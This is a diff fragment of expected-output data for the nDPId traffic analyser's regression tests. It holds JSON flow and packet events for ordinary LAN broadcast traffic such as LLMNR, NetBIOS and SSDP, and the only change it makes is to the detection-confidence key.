00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":711,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391254,"flow_last_seen":1470104391254,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104391254,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":63659,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":711,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1470104391254,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1470104391254,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACARAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQAD+KsU6wAgEMLGawAAAAEAAAAAAAAGaXNhdGFwAAABAAE="} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":711,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391254,"flow_last_seen":1470104391254,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104391254,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":63659,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":711,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391254,"flow_last_seen":1470104391254,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104391254,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":63659,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":712,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391254,"flow_last_seen":1470104391254,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104391254,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":51714,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":712,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1470104391254,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104391254,"pkt":"AQBeAAD8PKn0WgOECABFAAA0HuAAAAER9UjAqAPs4AAA\/MoCFOsAIFaUxmsAAAABAAAAAAAABmlzYXRhcAAAAQAB"} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":712,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391254,"flow_last_seen":1470104391254,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104391254,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":51714,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":712,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391254,"flow_last_seen":1470104391254,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104391254,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":51714,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":714,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1470104391361,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1470104391361,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACARAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQAD+KsU6wAgEMLGawAAAAEAAAAAAAAGaXNhdGFwAAABAAE="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":715,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1470104391362,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104391362,"pkt":"AQBeAAD8PKn0WgOECABFAAA0HuEAAAER9UfAqAPs4AAA\/MoCFOsAIFaUxmsAAAABAAAAAAAABmlzYXRhcAAAAQAB"} 00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":718,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1470104391458,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1470104391458,"pkt":"AQBef\/\/66LH8q\/uyCABFAAClCe4AAAQR9obAqAUx7\/\/\/+sn4B2wAkYV1TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":720,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391564,"flow_last_seen":1470104391564,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104391564,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":720,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1470104391564,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104391564,"pkt":"\/\/\/\/\/\/\/\/PKn0WgOECABFAABOHugAAIARlnrAqAPswKj\/\/wCJAIkAOqdmilEBEAABAAAAAAAAIEVKRkRFQkZFRUJGQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":720,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391564,"flow_last_seen":1470104391564,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104391564,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":720,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391564,"flow_last_seen":1470104391564,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104391564,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":726,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104392072,"flow_last_seen":1470104392072,"flow_idle_time":200000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1470104392072,"l3_proto":"ip4","src_ip":"192.168.140.140","dst_ip":"255.255.255.255","src_port":62976,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00881{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1470104392072,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"thread_ts_msec":1470104392072,"pkt":"\/\/\/\/\/\/\/\/wKC7c+tXCABFAAFZOwBAAEARsV\/AqIyM\/\/\/\/\/\/YA9gABRQTx\/\/\/Z1aAAwKC7c+tXwKiMjAAAAgAnAURHUy0xMjEwLTEwUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABTd2l0Y2gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADMuMTAuMDEzAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwKC7c+tXQjEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABRUDBSMUQ5MDAwMDI2AAAAAAAAAAAAAAAAAAAAAAAAAERHUy0xMjEwLTEwUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAqIyM\/\/8AAFBvcnQgOAAAIAGwIAAGAADCoLv\/\/nPrV0A="} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":727,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104392072,"flow_last_seen":1470104392072,"flow_idle_time":200000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1470104392072,"l3_proto":"ip6","src_ip":"2001:b020:6::c2a0:bbff:fe73:eb57","dst_ip":"ff02::1","src_port":62976,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00914{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":727,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1470104392072,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":391,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":391,"pkt_l4_len":337,"thread_ts_msec":1470104392072,"pkt":"MzMAAAABwKC7c+tXht1gAAAAAVERgCABsCAABgAAwqC7\/\/5z61f\/AgAAAAAAAAAAAAAAAAAB9gD2AAFRMAf\/D9nVoADAoLtz61cgAbAgAAYAAMKgu\/\/+c+tXAAACACcBREdTLTEyMTAtMTBQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFN3aXRjaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMy4xMC4wMTMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAoLtz61dCMQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFFQMFIxRDkwMDAwMjYAAAAAAAAAAAAAAAAAAAAAAAAAREdTLTEyMTAtMTBQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMCojIz\/\/wAAUG9ydCA4AAAgAbAgAAYAAMKgu\/\/+c+tXQA=="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":730,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104392380,"flow_last_seen":1470104392380,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104392380,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59789,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":730,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1470104392380,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104392380,"pkt":"\/\/\/\/\/\/\/\/4KzLceHQCABFAABOckUAAEARgdzAqAUtwKj\/\/+mNAIkAOs9OABUBEAABAAAAAAAAIEZERUJFT0VLRUpDTkVNRUpFR0VGRUNFUEVQRUxDTkNBAAAgAAE="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":730,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104392380,"flow_last_seen":1470104392380,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104392380,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59789,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":730,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104392380,"flow_last_seen":1470104392380,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104392380,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59789,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":738,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1470104393097,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104393097,"pkt":"\/\/\/\/\/\/\/\/PKn0WgOECABFAABOHxQAAIARlk7AqAPswKj\/\/wCJAIkAOqdmilEBEAABAAAAAAAAIEVKRkRFQkZFRUJGQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104393610,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59461,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1470104393610,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104393610,"pkt":"\/\/\/\/\/\/\/\/4KzLceHQCABFAABOGrEAAEAR2XDAqAUtwKj\/\/+hFAIkAOjOmABcBEAABAAAAAAAAIEVIRUdFSkVNRUZDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUNBAAAgAAE="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":745,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104393610,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59461,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":745,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104393610,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59461,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":746,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104393610,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1470104393610,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104393610,"pkt":"\/\/\/\/\/\/\/\/4KzLceHQCABFAABOnJgAAEARV4nAqAUtwKj\/\/wCJAIkAOr16RfsBEAABAAAAAAAAIEVPRUJGREVHRUpFTUVGQ0FDQUNBQ0FDQUNBQ0FDQUJOAAAgAAE="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":746,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104393610,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":746,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104393610,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":747,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1470104393610,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1470104393610,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1470104393610,"pkt":"\/\/\/\/\/\/\/\/4KzLceHQCABFAADKO0kAAEARuFzAqAUtwKj\/\/wCKAIoAtoWlEQJF7sCoBS0AAACgAAAgRU5FQkVERUNFUEVQRUxFQkVKRkNDTkVGREJFRURBQUEAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAA1TQAAO1FEQAABgAAAAAAAAACAAAAAAAAAAAAAAAGAFYAAwABAAEAAgAXAFxNQUlMU0xPVFxCUk9XU0UACQTsRQAA"} -00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":747,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1470104393610,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":747,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1470104393610,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":748,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":1470104393610,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1470104393610,"pkt":"\/\/\/\/\/\/\/\/4KzLceHQCABFAADK5DUAAEARD3DAqAUtwKj\/\/wCKAIoAtoasEQJF8cCoBS0AAACgAAAgRU5FQkVERUNFUEVQRUxFQkVKRkNDTkVGREJFRURBQUEAIEVORkRFSUVQRU5FRkNBQ0FDQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAA1TQAAPBFEQAABgAAAAAAAAACAAAAAAAAAAAAAAAGAFYAAwABAAEAAgAXAFxNQUlMU0xPVFxCUk9XU0UACQTvRQAA"} 00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":749,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":1470104393611,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1470104393611,"pkt":"\/\/\/\/\/\/\/\/4KzLceHQCABFAADKOS4AAEARunfAqAUtwKj\/\/wCKAIoAtoChEQJF98CoBS0AAACgAAAgRU5FQkVERUNFUEVQRUxFQkVKRkNDTkVGREJFRURBQUEAIEVORkpFSEZDRVBGRkZBQ0FDQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAA1TQAAPZFEQAABgAAAAAAAAACAAAAAAAAAAAAAAAGAFYAAwABAAEAAgAXAFxNQUlMU0xPVFxCUk9XU0UACQT1RQAA"} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":753,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":1470104393813,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104393813,"pkt":"\/\/\/\/\/\/\/\/PKn0WgOECABFAABOHxcAAIARlkvAqAPswKj\/\/wCJAIkAOqdiilUBEAABAAAAAAAAIEVKRkRFQkZFRUJGQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="} @@ -309,46 +309,46 @@ 